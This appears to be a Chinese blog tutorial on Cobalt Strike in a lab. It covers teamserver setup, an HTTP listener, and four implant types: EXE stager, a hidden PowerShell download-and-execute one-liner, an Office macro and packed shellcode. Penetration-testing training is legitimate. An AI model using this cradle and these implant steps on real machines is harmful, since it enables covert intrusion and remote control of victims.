Cobalt Strike详细使用教程

CobaltStrike详细使用操作流程

工具介绍

CS是什么?
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。

实验环境

本次实验环境
Kali_Linux: 10.9.23.183 teamserver团队服务器
Win11客户端 :10.9.23.2
Win11受害者:10.9.23.2

运行CobaltStrike工具必须要有java环境,所以要提前装好jdk.

CobaltStrike详细使用

1.启动CobaltStrike

因为服务端是kali,我们将server文件复制到kali

可以看到一共有4个参数
主机ip
密码
配置文件
木马到期时间
image.png

设置一个主机IP和密码即可
可以看到链接服务器的默认端口号为50050

sudo ./teamserver 10.9.23.183 123456

image.png|525

2.客户端连接团队服务端

主机的ip地址就是kaliteamserver团队服务器(以下简称服务端)地址10.9.23.183
这里的user为服务端里的昵称
密码就是刚刚服务端中设置的密码:123456
只需要配置好IP和密码即可
image.png|475
连接成功>显示窗口
image.png|500

3.配置监听器

监听器可以理解为配置木马传输的管道
点击进来以后,会发现有很多种协议
按照下方设置即可
选择一个HTTP协议,命名为hppt,端口自定义设置,我设置成7777进行监听
image.png|525

点击save保存,监听开始
image.png

4.生成木马(四种木马的上线过程)

这里演示四种木马的上线过程

1)Windows Stager Payload(EXE)

image.png|500

然后选择刚刚设置好的监听器,最后确认就行
image.png|500

配置木马生成的路径,这里我保存到桌面,给木马程序命名
image.png|500

保存之后,就会生成一个木马在桌面
因为受害者也在这台主机上 直接双击运行刚才生成的exe文件即可

目标服务器成功上线cs
这个sleep的大致意思表示,在客户端执行的操作命令每过一分钟 木马向我们服务器输入的操作命令框请求一下需要执行的命令,如果觉得命令请求时间太长,可手动输入命令sleep 2 来缩短请求时长
image.png|500

2)PowerShell

image.png
选择刚刚设置好的监听器,最后确认就行
端口最好用80端口,他需要开启80端口去借助url路径去把木马传到受害主机上
image.png|500

复制出路径

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.9.23.183:80/a'))"

|500

受害者主机去执行路径
image.png|500

目标服务器成功上线cs
image.png

唯一不同点就是看通过哪个恶意的进程上线的这个主机,pid为进程号
木马前期没有弄结束日期的话我们就要去受害者主机去手动删除一下占用的进程号
客户端单方面删除没用 受害机再次启动我们服务器这边就上线了

3)office宏病毒

image.png

点击之后会出现office宏病毒的使用方式
按照使用方式即可
image.png|500

将刚才复制的宏病毒代码编辑到文本里
image.png|500

最后保存为支持宏的文档
image.png

受害者主打开带有宏病毒的word文档
目标服务器成功上线cs
image.png|500

4)shellcode

image.png|500
选择监听器
生成.c文件
image.png|500

这里使用掩日工具做一个套壳
将刚才的.c文件套壳为exe文件
image.png|500

此时就有一个.exe文件
受害者主机去执行这个文件
目标服务器成功上线cs
image.png

  • 46
    点赞
  • 52
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值